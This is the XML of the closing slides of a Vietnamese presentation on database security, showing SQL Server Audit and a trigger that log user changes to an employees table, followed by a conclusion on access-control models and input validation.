                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>viên</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10400" u="none" dirty="0">
              <a:solidFill>
                <a:srgbClr val="9A6547"/>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xmlns="" id="{6322F289-5A43-40F4-3ABA-E4C8E6FCE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5" y="0"/>
            <a:ext cx="5059898" cy="1028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11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{D9A08C7F-94F6-0AC3-8966-9DFC8D2325F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="753031260"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6057216" y="4076699"/>
          <a:ext cx="10935383" cy="52679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Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6E0BBB21-F31D-68C3-6B3F-1E4694E8140A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8643960" y="992187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a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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xmlns=""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62A624EE-FBA4-1720-F8DE-88C0BA0DF7D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3381486"/>
            <a:ext cx="15316200"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Server Audit để giám sát các hoạt động Update và Insert trên bảng employees bởi người dùng</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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96E6B241-D038-D2A9-AE3F-AF2C97F747B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="848912" y="3941826"/>
            <a:ext cx="8609133" cy="5087874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{9178DA98-2EA8-BF90-C3E5-452EA2BEFF4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9353549" y="4102902"/>
            <a:ext cx="8146274" cy="5100875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C56AE39A-4822-0C38-A72F-03A2492B5E59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8202111" y="9906560"/>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20</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10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{B5B2B235-A6F6-A2FF-5F18-58B7D85631D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8105494" y="8986474"/>
            <a:ext cx="274319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Audit</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xmlns=""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bảng để ghi lại các log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2C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="9100439"/>
            <a:ext cx="27432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bảng ghi log</a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2400" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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E52E683D-102A-5367-CB4D-7114CA2735B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3963268" y="3925407"/>
            <a:ext cx="10056663" cy="5058563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{5CF54C15-A0C8-81F6-0201-98B25C5A2495}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8157624" y="9608639"/>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21</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159557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xmlns=""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2F5E8BB7-159C-5DD5-AEF3-BA2716ACE15F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1250175" y="2741532"/>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49934895-F14D-3BC9-81EC-9EF88F6A38E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1231125" y="3232466"/>
            <a:ext cx="12811546"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Tạo Trigger để kiểm tra người dùng nào thay đổi giá trị trong bảng employees</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4BC471D1-E07B-CF3C-7676-C2934BF007D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="750309" y="3726416"/>
            <a:ext cx="8088892" cy="6273590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{A7DBBFA6-E5A4-5504-7293-721CA5673510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9278260" y="3901076"/>
            <a:ext cx="8677780" cy="5859507"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{2C928BF6-51EE-789A-8FCA-31B2642FABD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7694141" y="9502012"/>
            <a:ext cx="24384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Trigger</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9" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C3F8119A-60B9-2CC8-B654-26DFE7DD2FC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7959767" y="9982324"/>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22</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379335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BF1964-67E4-9AF7-B783-874F8707DE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7A69AF8B-CD7E-36C9-E4CF-0715B10A4D3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14B87313-B1E2-AF4E-BF99-23873C32B8E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="321436"/>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33C83951-A210-E509-6AB0-D45BE9460A86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533400" y="2112946"/>
            <a:ext cx="17602199" cy="7907354"/>
            <a:chOff x="40798" y="71151"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Freeform 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{C44C37D9-74AC-C308-F383-8C6E01474C0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CE007B66-0D4F-9DC0-0E49-2D7D95B0410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xmlns="" id="{6E17380F-05BC-B32F-44EA-21CECEC03382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915868" y="2208826"/>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680FF41A-F6DC-3D76-185F-2D433155FBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="984951" y="5083706"/>
            <a:ext cx="15710227"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xmlns="" id="{5D36C0F9-6080-5AB8-14E9-EFC1A4905D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="915868" y="2718515"/>
            <a:ext cx="16146324" cy="47705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b="1">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Test lệnh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>(được thực thi lệnh update và insert trên bảng Employees) đã cài đặt từ trước </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" b="1" i="0">
              <a:solidFill>
                <a:srgbClr val="1B1B1B"/>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4C17196-A237-95D5-A4B6-C1795C904747}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1515836" y="3154726"/>
            <a:ext cx="3583876" cy="1738711"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{47A3E2C5-DADA-ABEC-682B-B7812FB1BEE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8484650" y="3218896"/>
            <a:ext cx="7518649" cy="1344395"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{CB0FE141-D6AD-DA68-92A6-A715929FAD00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281691" y="5915813"/>
            <a:ext cx="16346348" cy="2681970"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{315D6960-8955-454D-4680-D7D9959C34CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7733261" y="9650282"/>
            <a:ext cx="7513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23</a:t>
            </a:fld>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/23</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4F5152FE-5A86-D064-C819-2EF1D0CBECDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3699348" y="4164323"/>
            <a:ext cx="921407" cy="230352"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6EFDD39F-B1BF-391A-EEC0-AADD78DEB060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6701415" y="7578601"/>
            <a:ext cx="687634" cy="275054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{7A4B9001-F30B-4F10-1D97-4C6290C0DC05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12492615" y="7578600"/>
            <a:ext cx="555787" cy="284543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{6610C180-CB96-8FE1-C5D4-4764438E105B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972459" y="8764954"/>
            <a:ext cx="12754563" cy="86177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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123258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324100"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="0" y="49134"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="49134"/>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74178" y="219633"/>
              <a:ext cx="3023569" cy="1732469"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marR="26035" algn="just">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="25"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" i="1">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KẾT LUẬN</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" i="1">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3600" i="1">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R="26035" algn="just">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="25"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600" b="1" i="1">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>- </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1" i="1">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Qua bài báo ta có thể thấy: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600" i="1">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>Việc b</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ảo vệ cơ sở dữ liệu trước các mối đe dọa từ internet là cực kỳ quan trọng để giảm thiểu lỗ hổng trong hệ thống phần mềm. </a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marR="26035" algn="just">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="25"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>- Sử dụng các mô hình truy cập </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>(MAC, DAC, RBAC), cài đặt các chính sách, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>cùng việc kiểm tra dữ liệu đầu vào và đánh giá lỗ hổng trong mã nguồn</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marR="26035" algn="just">
                <a:lnSpc>
                  <a:spcPct val="115000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="25"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="3600" b="1">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>- Bảo vệ dữ liệu thông qua các quy trình lưu trữ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>có tính logic, </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>ta có thể tăng cường bảo vệ</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>, kiểm tra quyền của người dùng </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="3600">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
